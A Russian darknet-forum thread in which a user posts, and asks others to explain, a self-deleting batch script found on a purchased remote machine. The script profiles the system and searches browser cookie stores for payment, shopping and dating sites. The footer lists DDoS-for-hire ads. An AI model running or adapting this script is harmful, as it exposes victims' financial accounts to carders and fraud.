Батник на деде

  • Автор темы Fedmex
  • Дата начала
F

Fedmex

Original poster
Покупал дед, на нем оказался такой батник, может кто расшифровать?
@echo off

setlocal ENABLEEXTENSIONS
set "paymentlist=cookie_check.paypal.com paypal.comcookie_check account.skrill.com westernunion.com neteller.com entropay.com 2checkout.com wepay.com .v.me gopayment.com dwolla.com aib.ie barclaycardus.com capitalone.com chase.com coinbase.com liqpay.com moneybookers.com open24.ie payeer.com paysurfer.com perfectmoney.com suntrust.com wellsfargo.com"
set "shoplist=sears.com overstock.com ebay.comnonsession dell.com amazon.comsession apple.comdssid beacon.walmart.com bestbuy.comcontext_id newegg.coms_per airbnb.com bhphotovideo.com farfetch.com lowes.com officedepot.com qvc.com steampowered.com target.com"
set "datinglist=match.com mysinglefriend.com friendfinder.com jdate.com gay.com christianconnection.com muddymatches.co.uk zoosk.com shaadi.com datingdirect.com lovearts.com amateurmatch.com cupid.com datehookup.com meetic.com meetme.com"
set "otherlist=accounts.google.com mail.live.com login.yahoo.com att.com sprint.com verizonwireless.com vzw.com verizon.com craiglist.org indeed.com sendspace.com swiftunlocks.com ups.com whoer.net fedex.com"

echo go > %temp%/win_install.log.txt

echo ====start_product==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName >> %temp%/win_install.log.txt
echo ====end_product==== >> %temp%/win_install.log.txt

echo ====start_cpuname==== >> %temp%/win_install.log.txt
REG QUERY "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0" /v ProcessorNameString >> %temp%/win_install.log.txt
echo ====end_cpuname==== >> %temp%/win_install.log.txt

echo ====start_cpus==== >> %temp%/win_install.log.txt
echo %NUMBER_OF_PROCESSORS% >> %temp%/win_install.log.txt
echo ====end_cpus==== >> %temp%/win_install.log.txt

echo ====start_domain==== >> %temp%/win_install.log.txt
echo %USERDOMAIN% >> %temp%/win_install.log.txt
echo ====end_domain==== >> %temp%/win_install.log.txt


::get soft list
echo ====start_softlist==== >> %temp%/win_install.log.txt
for /f "skip=4 tokens=*" %%a in ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"') do (
::echo %%~na
for /f "tokens=*" %%b in ('REG QUERY "%%a" /v DisplayName 2^>nul') do (
echo %%b>> %temp%/win_install.log.txt
)
)
echo ====end_softlist==== >> %temp%/win_install.log.txt

echo ====start_tasklist==== >> %temp%/win_install.log.txt
tasklist >> %temp%/win_install.log.txt
echo ====end_tasklist==== >> %temp%/win_install.log.txt


echo ====start_admin==== >> %temp%/win_install.log.txt

::check for admin rights
net session >nul 2>&1
if %errorLevel% == 0 (
echo userisadmin >> %temp%/win_install.log.txt
) else (
echo userisnotadmin >> %temp%/win_install.log.txt
)

echo ====end_admin==== >> %temp%/win_install.log.txt

echo ====start_ip==== >> %temp%/win_install.log.txt

::now get IPV4 from ipconfig
ipconfig | find "IPv4" >> %temp%/win_install.log.txt

echo ====end_ip==== >> %temp%/win_install.log.txt

echo ====start_brws==== >> %temp%/win_install.log.txt
IF EXIST "%programfiles(x86)%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles(x86)%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Google\Chrome\" (
echo brw_chrome_exist >> %temp%/win_install.log.txt
)
IF EXIST "%programfiles%\Mozilla Firefox\" (
echo brw_firefox_exist >> %temp%/win_install.log.txt
)
echo ====end_brws==== >> %temp%/win_install.log.txt

echo ====start_src==== >> %temp%/win_install.log.txt

::check if ie
IF EXIST %appdata%\Microsoft\Windows\Cookies (
echo browser: ie yes >> %temp%/win_install.log.txt

cd /d %appdata%\Microsoft\Windows\Cookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

IF EXIST %appdata%\Microsoft\Windows\Cookies\Low (

cd /d %appdata%\Microsoft\Windows\Cookies\Low

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)

)


)

::check if ie in win 8,8.1,10
IF EXIST %localappdata%\Microsoft\Windows\INetCookies (

cd /d %localappdata%\Microsoft\Windows\INetCookies

for %%i in (%paymentlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i *>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)


)

::check if firefox installed
IF EXIST %appdata%\Mozilla\Firefox (

cd /d %appdata%\Mozilla\Firefox\Profiles

for /d %%F in (*) do cd /d "%%F"

IF EXIST cookies.sqlite (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i cookies.sqlite>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)

)

::check if chrome installed
IF EXIST %localappdata%\Google\Chrome\User Data\Default (

cd /d %localappdata%\Google\Chrome\User Data\Default

IF EXIST Cookies (
::search payments
for %%i in (%paymentlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_pay: %%i >> %temp%/win_install.log.txt
)

::search shops
for %%i in (%shoplist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_shp: %%i >> %temp%/win_install.log.txt
)

::search dating
for %%i in (%datinglist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_dat: %%i >> %temp%/win_install.log.txt
)

::search others
for %%i in (%otherlist%) do (
findstr /m %%i Cookies>nul
if errorlevel 0 if not errorlevel 1 echo found_oth: %%i >> %temp%/win_install.log.txt
)
)



)

echo ====end_src==== >> %temp%/win_install.log.txt

::notepad %temp%/win_install.log.txt

cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt


::echo Please press enter to exit and delete file

::pause >nul


DEL "%~f0"
 
L

LamerOnLine

Original poster
Fedmex сказал(а):
Покупал дед, на нем оказался такой батник, может кто расшифровать?
Нажмите, чтобы раскрыть...
Если удалить нижние строчки
cd /d %temp%
TYPE win_install.log.txt | clip
del win_install.log.txt


::echo Please press enter to exit and delete file

::pause >nul


DEL "%~f0"
Файл создаст отчёт в папке C:\Users\Имя_пользователя\AppData\Local\Temp
В нём будет:
Версия ОС, модель процессора, количество ядер, имя компьютера.
Установленный софт.
Список запущенных процессов.
Проверка пользователя на права администратора.
Все IPv4 адреса.
Установленные браузеры.
Проверка URL адресов из списка в истории этих браузеров.
 
  • Like
Реакции: Fedmex
Для ответа нужно войти/зарегистрироваться
Название темы
Автор Заголовок Раздел Ответы Дата
1 Батник для создания скрытых учёток, бэкдоров и т.д. Уязвимости и взлом 0
Support81 Настройка Postfix&DKIM на сервере Ubuntu Полезные статьи 0
Kain Проверено Предоставляю DDOS атаки на сайты и сервера. Спам / Флуд / Ддос 1
Support81 Ваш VPN будет стучать на вас. Где мы свернули не туда? Новости в сети 0
Support81 МВД требует срочных полномочий — банкам дадут три дня на ответ, а полиции — доступ к звонкам Новости в сети 0
Support81 Разборка в даркнете закончилась падением GitLab, утечками Web3 и атаками на банки Новости в сети 0
whiteside Продам ОРГАНИЗУЮ DDOS АТАКУ НА САЙ ТВОЕГО КОНКУРЕНТА Спам / Флуд / Ддос 0
Support81 Открываешь Zenmap — запускаешь Bumblebee. Добро пожаловать на новый уровень социальной инженерии Новости в сети 0
Support81 Cetus Protocol обокрали на $223 млн, и теперь они умоляют хакера отдать хотя бы часть — за амнистию и чай Новости в сети 0
Support81 Письмо от «шефа», фальшивая переписка и счёт на услуги — как российские компании теряют деньги, не заметив подмены Новости в сети 0
Support81 На коробке написано «VPN и защита», внутри — перехват куки, фальшивые DOM-элементы и доступ ко всем вкладкам браузера Новости в сети 0
Support81 Карточка есть, деньги на месте — и всё равно идёшь домой без покупок Новости в сети 0
Support81 Кликнул на акцию, продал квартиру — TDS делает фейк неотличимым от реальности Новости в сети 0
Support81 США официально развязывают руки хакерам и ставят ИИ на госслужбу Новости в сети 1
Support81 50 хакеров на одного агента ФБР: США почти признались в беспомощности перед китайской киберармией Новости в сети 0
Support81 ChoiceJacking: всего 25 секунд на зарядке — и любой смартфон раскроет свои секреты Новости в сети 0
Support81 Зашёл на сайт — открыл ворота в инфраструктуру. Lazarus снова в деле Новости в сети 0
Chekon ✅ sms.chekons.com - ⭐ Сайт для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" от 0.4$ за номер⭐ Ищу работу. Предлагаю свои услуги. 0
Support81 ИИ-дубляж на YouTube: Видео создаются людьми, а успех достаётся машинам Новости в сети 0
Chekon ✅USMobileSMSBot - Telegram Bot (24/7) SMS ВЕРИФИКАЦИИ НА РЕАЛЬНЫЕ НОМЕРА USA ОДНОРАЗОВАЯ И ДОЛГОСРОЧНАЯ АРЕНДА Non-VoIP. Ищу работу. Предлагаю свои услуги. 0
Support81 Фейк не пройдёт: Google включила антивирус на рекламу Новости в сети 0
Support81 Мод на «ходить сквозь стены» в Roblox? Теперь вирус ходит сквозь ваш телефон Новости в сети 0
Support81 Трёхслойное шифрование и туннелирование: BRICKSTORM сносит любую защиту на своём пути Новости в сети 0
Support81 «PIN-код на лбу безопаснее»: Perplexity AI оказался настоящей находкой для шпиона Новости в сети 0
Support81 Хактивизм или шпионаж: кто на самом деле отключает воду и свет в городах Новости в сети 0
Support81 Вся финансовая система на GPT: что может пойти не так Новости в сети 0
Support81 25 000 за воздух: как «таможенники» из Telegram разводят на доверии Новости в сети 0
Support81 20 лет, миллионы на крипте и почти 60 за решёткой — кто такой King Bob из Scattered Spider? Новости в сети 0
wrangler65 Модель OnlyFans чуть не отправилась на тот свет из-за… голубя! Новости в сети 0
turbion0 Аферист предстанет перед судом за мошенничество более чем на 100 миллионов рублей. Новости в сети 0
Support81 Ошибка на TOR-сайте обернулась концом сразу для трёх группировок Новости в сети 0
Support81 Обман на блокчейне: кто нажился на фальшивом «да» от Украины Новости в сети 0
Support81 Хакеры добрались до ИИ-трейдинга: взлом на $107 000 Новости в сети 0
Support81 Романтика поддельная, деньги настоящие: четыре преступные группы обманули одиноких россиян на 9,8 млн Новости в сети 0
Support81 Кто за кулисами крипторынка: тайные игроки, влияющие на стоимость монет Новости в сети 0
Support81 ИИ-атаки на подъёме: почему 2024 год стал переломным для кибербезопасности Новости в сети 0
Support81 Data Ransom: шантаж выделился в самостоятельный сервис на черном рынке данных Новости в сети 0
Support81 Двойники Telegram захватили сеть: миллион пользователей на крючке Новости в сети 0
Support81 Сбой на ключевом интернет-узле в Москве: что произошло? Новости в сети 0
Support81 Заморозка помощи США лишила жертв работорговли в Азии надежды на спасение Новости в сети 0
Support81 Вакансии есть, специалистов нет: кризис на рынке информационной безопасности Новости в сети 0
Support81 INC Ransom: киберпреступная элита, которая держит весь мир на крючке Новости в сети 0
Support81 Ковровые бомбардировки в сети: DDoS-атаки выросли на 268% Новости в сети 0
Support81 Скамеры дуреют с этой прикормки: как секретный токен ФБР вывел мошенников на чистую воду Новости в сети 0
W На каких форумов сливают?? Вопросы и интересы 2
Support81 Банды программ-вымогателей выдают себя за ИТ-поддержку в фишинговых атаках на Microsoft Teams Новости в сети 0
Support81 ChatGPT вместо мозгов: школьники массово переходят на ChatGPT Новости в сети 0
Support81 Российские хакеры заработали 158 000 000 на поиске уязвимостей Новости в сети 0
Support81 12 недель на решение: как Великобритания планирует побороть кибервымогательство Новости в сети 0
wrangler65 Интересно Как сэкономить до 70% на переводах USDT TRC-20 через энергию Полезные статьи 0

Название темы

Русскоязычный Даркнет Форум
Верх Низ